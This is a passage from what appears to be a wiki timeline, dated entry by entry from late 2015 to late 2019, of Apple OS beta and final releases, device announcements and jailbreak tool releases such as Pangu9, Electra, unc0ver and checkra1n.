* 10 November -- [[checkra1n]] beta 0.9 released.
* 7 November -- iOS/iPadOS 13.2.2 released.
* 5 November -- iOS/iPadOS 13.3 beta, tvOS 13.3 beta and watchOS 6.1.1 beta released.

=== October ===
* 30 October -- audioOS 13.2.1 released.
* 29 October -- watchOS 5.3.3 and 6.1 released.
* 28 October -- iOS/iPadOS 13.2, iOS 12.4.3, audioOS 13.2 and tvOS 13.2 released.
* 23 October -- iOS/iPadOS 13.2 beta 4, watchOS 6.1 beta 5 and tvOS 13.2 beta 4 released.
* 16 October -- iOS/iPadOS 13.2 beta 3, watchOS 6.1 beta 4 and tvOS 13.2 beta 3 released.
* 15 October -- iOS/iPadOS 13.1.3 released.
* 10 October -- iOS/iPadOS 13.2 beta 2, watchOS 6.1 beta 3 and tvOS 13.2 beta 2 released.
* 9 October -- watchOS 5.3.2 for [[Apple Watch Series 4]] released.
* 7 October -- [[bridgeOS]] 4.0 released.
* 2 October -- iOS/iPadOS 13.2 beta, watchOS 6.1 beta 2 and tvOS 13.2 beta released.

=== September ===
* 30 September -- iOS/iPadOS 13.1.2, watchOS 6.0.1, and watchOS 5.3.2 for [[Apple Watch Series 3]] released.
* 27 September -- iOS/iPadOS 13.1.1 released.
* 26 September -- iOS 12.4.2 for [[iPad Air]], [[iPad mini 2]], [[iPad mini 3]], [[iPhone 5s]], [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[N102AP|iPod touch (6th generation)]], and watchOS 5.3.2 for [[Apple Watch Series 1]] and [[Apple Watch Series 2]] released.
* 24 September -- iOS/iPadOS 13.1 and tvOS 13.0 released.
* 23 September -- watchOS 6.1 beta released.
* 22 September -- [[unc0ver]] updated to v3.7.0b1 with iOS 12.0-12.4 support (excluding iOS 12.3-12.3.1) for A12/A12X devices.
* 20 September -- [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]] available to purchase. tvOS 13 beta 11 renamed to [[Golden Master|GM]].
* 19 September -- iOS 13.0 for [[List of iPhones|iPhones]] and watchOS 6.0 released.
* 18 September -- iOS/iPadOS 13.1 beta 4 and tvOS 13.0 beta 11 released.
* 13 September -- [[N104AP|iPhone 11]], [[D421AP|iPhone 11 Pro]], and [[D431AP|iPhone 11 Pro Max]] available for pre-order.
* 11 September -- watchOS 6.0 [[Golden Master|GM]] released.
* 10 September -- '''By Innovation Only 2019''' event announcing [[Apple Watch Series 5]], [[iPad (7th generation)]], [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]]. iOS/iPadOS 13.1 beta 3, tvOS 13.0 beta 10, and iOS 13.0 [[Golden Master|GM]] (excluding iPod touch) released.
* 4 September -- iOS/iPadOS 13.1 beta 2 and tvOS 13.0 beta 9 released.

=== August ===
* 27 August -- iOS/iPadOS 13.1 beta, tvOS 13.0 beta 8 and watchOS 6.0 beta 9 released.
* 26 August -- iOS 12.4.1, tvOS 12.4.1, and watchOS 5.3.1 released.
* 21 August -- iOS/iPadOS 13.0 beta 8 and watchOS 6.0 beta 8 released. [[Chimera|ChimeraTV]] updated to support tvOS 12.4.
* 19 August -- [[Chimera]] updated to 1.2.8 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for A9-A11 devices.
* 18 August -- [[unc0ver]] updated to v3.5.0 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for non A12 devices.
* 15 August -- iOS/iPadOS 13.0 beta 7, tvOS 13.0 beta 7 and watchOS 6.0 beta 7 released.
* 7 August -- iOS/iPadOS 13.0 beta 6, tvOS 13.0 beta 6 and watchOS 6.0 beta 6 released.

=== July ===
* 30 July -- watchOS 6.0 beta 5 released.
* 29 July -- iOS/iPadOS 13.0 beta 5 and tvOS 13.0 beta 5 released.
* 22 July -- iOS 12.4, iOS 10.3.4 for [[iPad (4th generation)]] and [[iPhone 5]], iOS 9.3.6 for [[K95AP|iPad2,3]], [[iPad mini|iPad2,6 iPad2,7]] [[iPad (3rd generation)|iPad3,2 iPad3,3]] and [[N94AP|iPhone 4s]], tvOS 12.4, watchOS 5.3, audioOS 12.4, and iBridge 3.6 released.
* 17 July -- iOS/iPadOS 13.0 beta 4, tvOS 13.0 beta 4 and watchOS 6.0 beta 4 released.
* 16 July -- iOS 12.4 beta 7, and watchOS 5.3 beta 6 released.
* 14 July -- [[Chimera]] updated to 1.2.3 to include support for some iOS 12.3 betas on A9-A11 devices. It was also updated to 1.2.2 for Apple TV 4K support up to tvOS 12.2.
* 12 July -- [[Chimera]] updated to 1.2.0 to include support for iOS 12.1.3-12.2 on A9-A11 devices.
* 11 July -- [[unc0ver]] updated to v3.3.0~b1 to include support for iOS 12.1.3-12.2 on A7-A11 devices.
* 9 July -- iOS 12.4 beta 6 and watchOS 5.3 beta 5 released.
* 8 July -- iOS/iPadOS 13.0 beta 3 (17A5522g) released.
* 2 July -- iOS/iPadOS 13.0 beta 3 (17A5522f), tvOS 13.0 beta 3 and watchOS 6.0 beta 3 released.

=== June ===
* 24 June -- iOS 12.4 beta 5 and watchOS 5.3 beta 4 released.
* 17 June -- iOS/iPadOS 13.0 beta 2, tvOS 13.0 beta 2 and watchOS 6.0 beta 2 released.
* 11 June -- iOS 12.4 beta 4, tvOS 12.4 beta 3 and watchOS 5.3 beta 3 released.
* 10 June -- iOS 12.3.2 for [[iPhone 8 Plus]] released.
* 3 June -- [[WWDC]] 2019. iOS/iPadOS 13.0 beta, tvOS 13.0 beta and watchOS 6.0 beta released.

=== May ===
* 29 May -- iOS 12.3.1 (16F8202) IPSW released for [[N112AP|iPod touch (7th generation)]].
* 28 May -- [[N112AP|iPod touch (7th generation)]] announced and available to order. iOS 12.3.1 (16F8202) OTA released for it. iOS 12.4 beta 3, tvOS 12.4 beta 2, and watchOS 5.3 beta 2 released.
* 24 May -- iOS 12.3.1 released.
* 20 May -- iOS 12.4 beta 2 released.
* 15 May -- iOS 12.4 beta, tvOS 12.4 beta and watchOS 5.3 beta released.
* 13 May -- iOS 12.3, tvOS 12.3, watchOS 5.2.1, audioOS 12.3 and Apple TV Software 7.3 released.
* 10 May -- iOS 12.3 beta 6 released.
* 7 May -- iOS 12.3 beta 5, tvOS 12.3 beta 5, Apple TV Software 7.3 beta 4 and watchOS 5.2.1 beta 5 released.

=== April ===
* 30 April -- [[Chimera]] jailbreak for all devices running iOS 12.0-12.1.2 and tvOS 12.0-12.1.1 released.
* 29 April -- iOS 12.3 beta 4, tvOS 12.3 beta 4, Apple TV Software 7.3 beta 3 and watchOS 5.2.1 beta 4 released.
* 22 April -- iOS 12.3 beta 3, tvOS 12.3 beta 3, Apple TV Software 7.3 beta 2 and watchOS 5.2.1 beta 3 released.
* 10 April -- tvOS 12.2.1 released.
* 8 April -- iOS 12.3 beta 2, tvOS 12.3 beta 2 and watchOS 5.2.1 beta 2 released.

=== March ===
* 28 March -- watchOS 5.2.1 beta released.
* 27 March -- iOS 12.3 beta, tvOS 12.3 beta, Apple TV Software 7.3 beta and watchOS 5.2 released.
* 25 March -- iOS 12.2, tvOS 12.2 and audioOS 12.2 released.
* 20 March -- [[AirPods (2nd generation)]] revealed.
* 18 March -- [[iPad Air (3rd generation)]] and [[iPad mini (5th generation)]] revealed. iOS 12.2 beta 6, tvOS 12.2 beta 6 and watchOS 5.2 beta 6 released.
* 11 March -- iOS 12.2 beta 5, tvOS 12.2 beta 5 and watchOS 5.2 beta 5 released.
* 4 March -- iOS 12.2 beta 4, tvOS 12.2 beta 4 and watchOS 5.2 beta 4 released.

=== February ===
* 20 February -- [[Electra]] updated to support jailbreaking tvOS 11.0-11.4.1.
* 19 February -- iOS 12.2 beta 3, tvOS 12.2 beta 3 and watchOS 5.2 beta 3 released.
* 7 February -- iOS 12.1.4 released.
* 4 February -- iOS 12.2 beta 2, tvOS 12.2 beta 2 and watchOS 5.2 beta 2 released.

=== January ===
* 30 January -- [[Electra]] and [[unc0ver]] updated to support jailbreaking iOS 11.4 and 11.4.1.
* 24 January -- iOS 12.2 beta, tvOS 12.2 beta and watchOS 5.2 beta released.
* 22 January -- iOS 12.1.3, tvOS 12.1.2, watchOS 5.1.3 and audioOS 12.1.3 released.
* 10 January -- iOS 12.1.3 beta 4 released.
* 7 January -- iOS 12.1.3 beta 3, tvOS 12.1.2 beta 3 and watchOS 5.1.3 beta 3 released.

== 2018 ==
=== December ===
* 20 December -- iOS 12.1.2 (16C104) released for iPhone.
* 19 December -- iOS 12.1.3 beta 2, tvOS 12.1.2 beta 2 and watchOS 5.1.3 beta 2 released.
* 17 December -- iOS 12.1.2 (16C101) released for iPhone.
* 10 December -- iOS 12.1.2 beta, tvOS 12.1.2 beta, and watchOS 5.1.3 beta released.
* 6 December -- watchOS 5.1.2 released.
* 5 December -- iOS 12.1.1, tvOS 12.1.1 and audioOS 12.1.1 released.

=== November ===
* 29 November -- tvOS 12.1.1 beta 4 released.
* 15 November -- iOS 12.1.1 beta 3, tvOS 12.1.1 beta 3, and watchOS 5.1.2 beta 2 released.
* 7 November -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] available for purchase. iOS 12.1.1 beta 2, tvOS 12.1.1 beta 2, and watchOS 5.1.2 beta released.
* 6 November -- iOS 12.1 (16B94) released for [[N841AP|iPhone XR]].
* 5 November -- watchOS 5.1.1 released.

=== October ===
* 31 October -- iOS 12.1.1 beta and tvOS 12.1.1 beta released.
* 30 October -- [[iPad Pro (11-inch)]], [[iPad Pro (12.9-inch) (3rd generation)]] and [[Apple Pencil (2nd generation)]] announced and available for pre-order. iOS 12.1, tvOS 12.1 and watchOS 5.1 released.
* 26 October -- [[N841AP|iPhone XR]] available for purchase.
* 22 October -- iOS 12.1 beta 5, tvOS 12.1 beta 5 and watchOS 5.1 beta 5 released.
* 19 October -- [[N841AP|iPhone XR]] available for pre-order.
* 15 October -- iOS 12.1 beta 4, tvOS 12.1 beta 4 and watchOS 5.1 beta 4 released.
* 9 October -- iOS 12.1 beta 3, tvOS 12.1 beta 3 and watchOS 5.1 beta 3 released.
* 8 October -- iOS 12.0.1 released.
* 2 October -- iOS 12.1 beta 2, tvOS 12.1 beta 2 and watchOS 5.1 beta 2 released.

=== September ===
* 27 September -- watchOS 5.0.1 released.
* 24 September -- tvOS 12.0.1 released.
* 21 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for purchase.
* 18 September -- iOS 12.1 beta, tvOS 12.1 beta and watchOS 5.1 beta released.
* 17 September -- audioOS 12.0, iOS 12.0, tvOS 12.0 and watchOS 5.0 released.
* 14 September -- [[Apple Watch Series 4]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] available for pre-order.
* 12 September -- [[Apple Watch Series 4]], [[N841AP|iPhone XR]], [[D321AP|iPhone XS]] and [[iPhone XS Max]] announced. iOS 12.0 [[Golden Master|GM]], tvOS 12.0 [[Golden Master|GM]] and watchOS 5.0 [[Golden Master|GM]] released.

=== August ===
* 31 August -- iOS 12.0 beta 12, tvOS 12.0 beta 10 and watchOS 12.0 beta 10 released.
* 27 August -- iOS 12.0 beta 11 and tvOS 12.0 beta 9 released.
* 24 August -- watchOS 5.0 beta 9 released
* 23 August -- iOS 12.0 beta 10 released.
* 20 August -- iOS 12.0 beta 9, tvOS 12.0 beta 8 and watchOS 5.0 beta 8 released.
* 15 August -- iOS 12.0 beta 8 released.
* 13 August -- iOS 12.0 beta 7, tvOS 12.0 beta 7 and watchOS 5.0 beta 7 released.
* 6 August -- iOS 12.0 beta 6, tvOS 12.0 beta 6 and watchOS 5.0 beta 6 released.

=== July ===
* 30 July -- iOS 12.0 beta 5, tvOS 12.0 beta 5 and watchOS 5.0 beta 5 released.
* 17 July -- iOS 12.0 beta 4, tvOS 12.0 beta 4 and watchOS 5.0 beta 4 released.
* 12 July -- [[Electra|ElectraTV]] released to jailbreak tvOS 11.2-11.3.
* 9 July -- audioOS 11.4.1, iOS 11.4.1, tvOS 11.4.1, and watchOS 4.3.2 released.
* 8 July -- [[backr00m]] released to jailbreak tvOS 10.2.2-11.1.
* 6 July -- [[Electra]] updated to jailbreak iOS 11.2-11.3.1.
* 3 July -- iOS 12.0 beta 3, tvOS 12.0 beta 3 and watchOS 5.0 beta 3 released.
* 2 July -- iOS 11.4.1 beta 5 released.

=== June ===
* 25 June -- iOS 11.4.1 beta 4, tvOS 11.4.1 beta 4, and watchOS 4.3.2 beta 3 released.
* 19 June -- iOS 12.0 beta 2, tvOS 12.0 beta 2 and watchOS 5.0 beta 2 released.
* 18 June -- iOS 11.4.1 beta 3 and tvOS 11.4.1 beta 3 released.
* 13 June -- watchOS 4.3.2 beta 2 released.
* 11 June -- iOS 11.4.1 beta 2, tvOS 11.4.1 beta 2, and watchOS 5.0 beta (build 16R5283r) released.
* 4 June -- iOS 12.0 beta, tvOS 12.0 beta and watchOS 5.0 beta (build 16R5283q) released. [[WWDC]] event.

=== May ===
* 30 May -- iOS 11.4.1 beta, tvOS 11.4.1 beta and watchOS 4.3.2 beta released.
* 29 May -- iOS 11.4, tvOS 11.4, watchOS 4.3.1 and audioOS 11.4 released.
* 17 May -- iOS 11.4 beta 6 released.
* 14 May -- iOS 11.4 beta 5, tvOS 11.4 beta 5 and watchOS 4.3.1 beta 5 released.
* 7 May -- iOS 11.4 beta 4, tvOS 11.4 beta 4 and watchOS 4.3.1 beta 4 released.
* 1 May -- iOS 11.4 beta 3, tvOS 11.4 beta 3 and watchOS 4.3.1 beta 3 released.

=== April ===
* 24 April -- iOS 11.3.1 released.
* 16 April -- iOS 11.4 beta 2, tvOS 11.4 beta 2 and watchOS 4.3.1 beta 2 released.
* 2 April -- iOS 11.4 beta, tvOS 11.4 beta and watchOS 4.3.1 beta released.

=== March ===
* 29 March -- audioOS 11.3, iOS 11.3, tvOS 11.3 and watchOS 4.3 released.
* 28 March -- iOS 11.3 for [[iPad (6th generation)]] released.
* 27 March -- [[iPad (6th generation)]] released.
* 20 March -- tvOS 11.3 beta 6 released.
* 16 March -- iOS 11.3 beta 6 and watchOS 4.3 beta 6 released.
* 12 March -- iOS 11.3 beta 5, tvOS 11.3 beta 5 and watchOS 4.3 beta 5 released.
* 6 March -- watchOS 4.3 beta 4 released.
* 5 March -- iOS 11.3 beta 4 and tvOS 11.3 beta 4 released.

=== February ===
* 26 February -- [[Electra]] 1.0 and 1.0.1 released to the public.
* 21 February -- watchOS 4.3 beta 3 released.
* 20 February -- iOS 11.3 beta 3 and tvOS 11.3 beta 3 released.
* 19 February -- iOS 11.2.6, tvOS 11.2.6 and watchOS 4.2.3 released.
* 7 February -- watchOS 4.3 beta 2 released.
* 6 February -- iOS 11.3 beta 2, and tvOS 11.3 beta 2 released.

=== January ===
* 25 January -- watchOS 4.3 beta released.
* 24 January -- iOS 11.3 beta and tvOS 11.3 beta released.
* 23 January -- iOS 11.2.5, tvOS 11.2.5, watchOS 4.2.2 and audioOS 11.2.5 beta 3 released.
* 19 January -- iOS 11.2.5 beta 7 and watchOS 4.2.2 beta 5 released.
* 17 January -- iOS 11.2.5 beta 6 and tvOS 11.2.5 beta 6 released.
* 12 January -- tvOS 11.2.5 beta 5 and [[Electra]] JB toolkit released.
* 11 January -- iOS 11.2.5 beta 5 released.
* 9 January -- iOS 11.2.5 beta 4, watchOS 4.2.2 beta 4 and tvOS 11.2.5 beta 4 released.
* 8 January -- iOS 11.2.2 released.
* 3 January -- iOS 11.2.5 beta 3, watchOS 4.2.2 beta 3 and tvOS 11.2.5 beta 3 released.

== 2017 ==
=== December ===
* 24 December -- [[h3lix]] beta 1 released to jailbreak 32-bit devices running iOS 10.x.
* 19 December -- iOS 11.2.5 beta 2, watchOS 4.2.2 beta 2, audioOS 11.2.5 beta 2 and tvOS 11.2.5 beta 2 released.
* 13 December -- iOS 11.2.1 and tvOS 11.2.1 released. iOS 11.2.5 beta, watchOS 4.2.2 beta, tvOS 11.2.5 beta, and audioOS 11.2.5 beta also released.
* 5 December -- watchOS 4.2 released.
* 4 December -- tvOS 11.2 released.
* 2 December -- iOS 11.2 released.
* 1 December -- iOS 11.2 beta 6 released.

=== November ===
* 28 November -- iOS 11.2 beta 5 and tvOS 11.2 beta 5 released.
* 17 November -- iOS 11.2 beta 4, tvOS 11.2 beta 4 and watchOS 11.2 beta 4 released.
* 16 November -- iOS 11.1.2 released.
* 13 November -- iOS 11.2 beta 3, tvOS 11.3 beta 3 and watchOS 4.2 beta 3 released.
* 9 November -- iOS 11.1.1 released.
* 6 November -- iOS 11.2 beta 2, tvOS 11.2 beta 2, watchOS 4.2 beta 2 and [[audioOS]] 11.2 beta 2 released.
* 3 November -- iPhone X released. iOS 11.2 beta 2 for [[iPhone X]] released.

=== October ===
* 31 October -- iOS 11.1, tvOS 11.1 and watchOS 4.1 released.
* 30 October -- iOS 11.2 beta, tvOS 11.2 beta, watchOS 4.2 beta and [[audioOS]] 11.2 beta released.
* 23 October -- iOS 11.1 beta 5 and tvOS 11.1 beta 4 released.
* 20 October -- iOS 11.1 beta 4 and watchOS 4.1 beta 4 released.
* 16 October -- iOS 11.1 beta 3, tvOS 11.1 beta 3 and watchOS 4.1 beta 3 released.
* 15 October -- [[Saïgon]] jailbreak released in beta.
* 11 October -- iOS 11.0.3 released.
* 9 October -- iOS 11.1 beta 2, tvOS 11.1 beta 2 and watchOS 4.1 beta 2 released.
* 4 October -- watchOS 4.0.1 released.
* 3 October -- iOS 11.0.2 released.

=== September ===
* 27 September -- iOS 11.1 beta, tvOS 11.1 beta and watchOS 4.1 beta released.
* 26 September -- iOS 11.0.1 released.
* 22 September -- [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], and [[iPhone 8 Plus]] released.
* 19 September -- iOS 11.0, tvOS 11.0 and watchOS 4.0 released. [[EtasonJB]] released for iOS 8.4.1.
* 12 September -- iOS 11.0 [[Golden Master|GM]], tvOS 11.0 [[Golden Master|GM]] and watchOS 4.0 [[Golden Master|GM]] released. [[Apple Watch Series 3]], [[Apple TV 4K]], [[iPhone 8]], [[iPhone 8 Plus]] and [[iPhone X]] announced.
* 6 September -- iOS 11.0 beta 10 released.
* 5 September -- tvOS 11.0 beta 10 released.

=== August ===
* 31 August -- iOS 11.0 beta 9 and tvOS 11.0 beta 9 released.
* 28 August -- iOS 11.0 beta 8, tvOS 11.0 beta 8 and watchOS 4.0 beta 8 released.
* 21 August -- iOS 11.0 beta 7, tvOS 11.0 beta 7 and watchOS 4.0 beta 7 released.
* 14 August -- iOS 11.0 beta 6, tvOS 11.0 beta 6 and watchOS 4.0 beta 6 released.
* 7 August -- iOS 11.0 beta 5, tvOS 11.0 beta 5 and watchOS 4.0 beta 5 released.

=== July ===
* 24 July -- iOS 11.0 beta 4, tvOS 11.0 beta 4 and watchOS 4.0 beta 4 released.
* 19 July -- iOS 10.3.3, tvOS 10.2.2 and watchOS 3.2.3 released.
* 13 July -- watchOS 4.0 beta 3 released.
* 10 July -- iOS 11.0 beta 3 and tvOS 11.0 beta 3 released.
* 6 July -- tvOS 10.2.2 beta 5 released.
* 5 July -- iOS 10.3.3 beta 6 released.

=== June ===
* 28 June -- iOS 10.3.3 beta 5 released.
* 26 June -- iOS 11.0 beta 2 (build 15A5304j), tvOS 11.0 beta 2 (build 15J5310h) and watchOS 3.2.3 beta 4 released.
* 22 June -- iOS 10.3.3 beta 4 and tvOS 10.2.2 beta 4 released.
* 21 June -- iOS 11.0 beta 2, tvOS 11.0 beta 2 and watchOS 4.0 beta 2 released.
* 13 June -- iOS 10.3.3 beta 3, tvOS 10.2.2 beta 3 and watchOS 3.2.3 beta 3 released.
* 7 June -- tvOS 11.0 beta (build 15J5284g) released.
* 5 June -- iOS 11.0 beta, tvOS 11.0 beta (build 15J5284e), watchOS 4.0 beta and iOS 10.3.2 for [[iPad Pro (12.9-inch) (2nd generation)]] and [[iPad Pro (10.5-inch)]] released.

=== May ===
* 30 May -- iOS 10.3.3 beta 2, tvOS 10.2.2 beta 2 and watchOS 3.2.3 beta 2 released.
* 16 May -- iOS 10.3.3 beta, tvOS 10.2.2 beta and watchOS 3.2.3 beta released.
* 15 May -- iOS 10.3.2, tvOS 10.2.1 and watchOS 3.2.2 released.
* 4 May -- tvOS 10.2.1 beta 5 released.

=== April ===
* 27 April -- iOS 10.3.2 beta 5 released.
* 24 April -- iOS 10.3.2 beta 4, watchOS 3.2.2 beta 4 and tvOS 10.2.1 beta 4 released.
* 17 April -- iOS 10.3.2 beta 3, watchOS 3.2.2 beta 3 and tvOS 10.2.1 beta 2 released.
* 11 April -- [[alloc8 Exploit]] released for all revisions of the [[iPhone 3GS]], along with [[ipwndfu]] as a tool to utilise this exploit.
* 10 April -- iOS 10.3.2 beta 2, watchOS 3.2.2 beta 2 and tvOS 10.2.1 beta 2 released.
* 3 April -- iOS 10.3.1 released.

=== March ===
* 28 March -- iOS 10.3.2 beta, watchOS 3.2.2 beta and tvOS 10.2.1 beta released.
* 27 March -- iOS 10.3, watchOS 3.2 and tvOS 10.2 released.
* 24 March -- [[iPad (5th generation)]], 32GB/128GB [[iPhone SE (1st generation)]] and PRODUCT(RED) [[iPhone 7]] available for purchase.
* 21 March -- [[iPad (5th generation)]] and iPhone 7 (PRODUCT)RED Special Edition announced.
* 20 March -- watchOS 3.2 beta 7 released.
* 16 March -- iOS 10.3 beta 7 released.
* 14 March -- tvOS 10.2 beta 6 and watchOS 3.2 beta 6 released.
* 13 March -- iOS 10.3 beta 6 released.
* 8 March -- iOS 10.3 beta 5, tvOS 10.2 beta 5 and watchOS 3.2 beta 5 released.

=== February ===
* 28 February -- tvOS 10.2 beta 4 released.
* 27 February -- iOS 10.3 beta 4 and watchOS 3.2 beta 4 released.
* 20 February -- iOS 10.3 beta 3, tvOS 10.2 beta 3 and watchOS 3.2 beta 3 released.
* 6 February -- iOS 10.3 beta 2, tvOS 10.2 beta 2 and watchOS 3.2 beta 2 released.

=== January ===
* 30 January -- watchOS 3.2 beta released.
* 24 January -- iOS 10.3 beta and tvOS 10.2 beta released.
* 23 January -- iOS 10.2.1, watchOS 3.1.3 and tvOS 10.1.1 released.
* 12 January -- iOS 10.2.1 beta 4 released.
* 9 January -- iOS 10.2.1 beta 3, watchOS 3.1.3 beta 2 and tvOS 10.1.1 beta 2 released.

== 2016 ==
=== December ===
* 21 December -- watchOS 3.1.3 beta released.
* 20 December -- iOS 10.2.1 beta 2 released.
* 14 December -- iOS 10.2.1 beta and tvOS 10.1.1 beta released.
* 13 December -- watchOS 3.1.1 retracted after reports of [[Apple Watch Series 2]] units bring bricked.
* 12 December -- iOS 10.2, tvOS 10.1, watchOS 3.1.1 and Apple TV iOS 7.2.2 released.
* 7 December -- iOS 10.2 beta 7 released. [[User:qwertyoruiop|qwertyoruiop]] releases [https://jbme.qwertyoruiop.com/ jbme] to re-enable the [[Pangu9]] jailbreak for iOS 9.3.3, as an alternative to the IPA.
* 6 December -- tvOS 10.1 beta 5 released.
* 5 December -- iOS 10.2 beta 6 and watchOS 3.1.1 beta 5 released.
* 2 December -- iOS 10.2 beta 5 released.

=== November ===
* 30 November -- tvOS 10.1 beta 4 released.
* 28 November -- iOS 10.2 beta 4 and watchOS 3.1.1 beta 4 released.
* 15 November -- watchOS 3.1.1 beta 3 released.
* 14 November -- iOS 10.2 beta 3, tvOS 10.1 beta 3 and 10.0.1 released.
* 9 November -- iOS 10.1.1 (14B150) released via IPSW's only.
* 7 November -- iOS 10.2 beta 2, tvOS 10.1 beta 2 and watchOS 3.1.1 beta 2 released.

=== October ===
* 31 October -- iOS 10.1.1, 10.2 beta, tvOS 10.1 beta and watchOS 3.1.1 beta released.
* 24 October -- iOS 10.1, tvOS 10.0.1 and watchOS 3.1 released.
* 20 October -- tvOS 10.0.1 beta 4 released.
* 19 October -- iOS 10.1 beta 5 for [[iPhone 7]] and [[iPhone 7 Plus]] released.
* 17 October -- iOS 10.0.3 for [[iPhone 7]] and [[iPhone 7 Plus]] and iOS 10.1 beta 4 released.
* 12 October -- watchOS 3.1 beta 3 released.
* 10 October -- iOS 10.1 beta 3 and tvOS 10.0.1 beta 3 released.
* 4 October -- iOS 10.1 beta 2, tvOS 10.0.1 beta 2 and watchOS 3.1 beta 2 released.

=== September ===
* 23 September -- iOS 10.0.2 released.
* 21 September -- iOS 10.1 beta, tvOS 10.0.1 beta and watchOS 3.1 beta released.
* 13 September -- iOS 10.0.1, tvOS 10.0 and watchOS 3.0 released.
* 7 September -- iOS 10.0.1 [[Golden Master|GM]], tvOS 10.0 [[Golden Master|GM]] and watchOS 3.0 [[Golden Master|GM]] released. [[Apple Watch Series 1]], [[Apple Watch Series 2]], [[iPhone 7]], [[iPhone 7 Plus]] and [[B188AP|AirPods (1st generation)]] announced.

=== August ===
* 26 August -- iOS 10.0 beta 8 and tvOS 10.0 beta 7 released.
* 25 August -- iOS 9.3.5 released.
* 19 August -- iOS 10.0 beta 7 released.
* 15 August -- iOS 10.0 beta 6, tvOS 10.0 beta 6 and watchOS 3.0 beta 6 released.
* 9 August -- iOS 10.0 beta 5, tvOS 10.0 beta 5 and watchOS 3.0 beta 5 released.
* 4 August -- iOS 9.3.4 released.
* 1 August -- iOS 10.0 beta 4, tvOS 10.0 beta 4 and watchOS 3.0 beta 4 released.

=== July ===
* 29 July -- [[Pangu9]] for iOS 9.2-9.3.3 English version released.
* 24 July -- [[Pangu9]] for iOS 9.2-9.3.3 released.
* 18 July -- iOS 10.0 beta 3, tvOS 10.0 beta 3 and watchOS 3.0 beta 3, iOS 9.3.3, watchOS 2.2.2 and tvOS 9.2.2 released.
* 6 July -- iOS 9.3.3 beta 5 and tvOS 9.2.2 beta 5 released.
* 5 July -- iOS 10.0 beta 2, tvOS 10.0 beta 2 and watchOS 3.0 beta 2 released.

=== June ===
* 29 June -- iOS 9.3.3 beta 4 and tvOS 9.2.2 beta 4 released.
* 21 June -- iOS 9.3.3 beta 3 and tvOS 9.2.2 beta 3 released.
* 13 June -- iOS 10.0 beta, tvOS 10.0 beta and watchOS 3.0 beta released.
* 6 June -- iOS 9.3.3 beta 2, tvOS 9.2.2 beta 2 and watchOS 2.2.2 beta released.
* 2 June -- iOS 9.3.2 (13F72) is released for the [[iPad Pro (9.7-inch)]].

=== May ===
* 23 May -- iOS 9.3.3 beta and tvOS 9.2.2 beta released.
* 19 May -- iOS 9.3.2 is retracted for the [[iPad Pro (9.7-inch)]] due to a bug that may prevent usage, but continues to be [[SHSH|signed]].
* 16 May -- iOS 9.3.2, tvOS 9.2.1 and watchOS 2.2.1 released.
* 3 May -- iOS 9.3.2 beta 4 and tvOS 9.2.1 beta 4 released.

=== April ===
* 27 April -- tvOS 9.2.1 beta 3 released.
* 26 April -- iOS 9.3.2 beta 3 released.
* 21 April -- tvOS 9.2.1 beta 2 re-released.
* 20 April -- iOS 9.3.2 beta 2 and watchOS 2.2.1 beta 2 released. tvOS 9.2.1 beta 2 was also made available, but it was quickly retracted due to a mishap with publishing.
* 6 April -- iOS 9.3.2 beta, watchOS 2.2.1 beta and tvOS 9.2.1 beta released.

=== March ===
* 31 March -- iOS 9.3.1 released.
* 28 March -- iOS 9.3 (13E237) released for iPad 2 ([[K93AP|iPad2,1]], [[K95AP|iPad2,3]], and [[K93AAP|iPad2,4]]), [[iPad (3rd generation)]], [[iPad (4th generation)]], [[iPad Air]], [[iPad mini]], [[iPad mini 2]], [[N94AP|iPhone 4s]], [[iPhone 5]], [[iPhone 5c]], [[iPhone 5s]], [[iPod touch (5th generation)]].
* 25 March -- iOS 9.3 (13E236) released for [[K94AP|iPad 2 (iPad2,2)]].
* 23 March -- Pangu released [[J42dAP|Apple TV HD]] [[tvOS]] 9.0 - 9.0.1 jailbreak (v1.0.0).
* 21 March -- iOS 9.3, tvOS 9.2 and watchOS 2.2 released to the public. [[iPad Pro (9.7-inch)]] and [[iPhone SE (1st generation)]] announced
* 16 March -- Pangu9 1.3.1 (Windows)/1.1.1 (Mac) released to make untether of iOS 9.1 more stable.
* 14 March -- iOS 9.3 beta 7 released.
* 11 March -- Pangu9 1.3.0 (Windows)/1.1.0 (Mac) released to jailbreak 64-bit devices on iOS 9.1.
* 10 March -- tvOS 9.2 beta 6 released.
* 7 March -- iOS 9.3 beta 6 and watchOS 2.2 beta 6 released.
* 1 March -- iOS 9.3 beta 5, tvOS 9.2 beta 5 and watchOS 2.2 beta 5 released.

=== February ===
* 25 February -- [[Apple TV (3rd generation)]] software 7.2.1 released.
* 22 February -- iOS 9.3 beta 4, tvOS 9.2 beta 4 and watchOS 2.2 beta 4 released.
* 18 February -- iOS 9.2.1 (13D20) for [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad mini 3]], [[iPad mini 4]], [[iPad Air 2]], and [[iPad Pro (12.9-inch)]] released.
* 8 February -- tvOS 9.2 beta 3, watchOS 2.2 beta 3 and iOS 9.3 beta 3 released.

=== January ===
* 25 January -- tvOS 9.1.1, 9.2 beta 2, watchOS 2.2 beta 2 and iOS 9.3 beta 2 released.
* 19 January -- iOS 9.2.1 released.
* 14 January -- iOS 9.3 beta 1.1 released.
* 11 January -- iOS 9.3, tvOS 9.1.1, tvOS 9.2 beta, and watchOS 2.2 beta released.
* 4 January -- iOS 9.2.1 beta 2 released.

== 2015 ==
=== December ===
* 25 December -- TaiG 2.4.5 released.
* 16 December -- iOS 9.2.1 beta seeded to developers.
* 8 December -- iOS 9.2, tvOS 9.1 and watchOS 2.1 released.

=== November ===
* 30 November -- TaiG 2.4.4 released (no longer beta).
* 20 November -- TaiG 2.4.4 beta released.
* 18 November -- iOS 9.2 beta 4 and tvOS 9.1 beta 3 released.
* 17 November -- iOS 9.1 (13B144) for iPad Pro (12.9-inch) released.
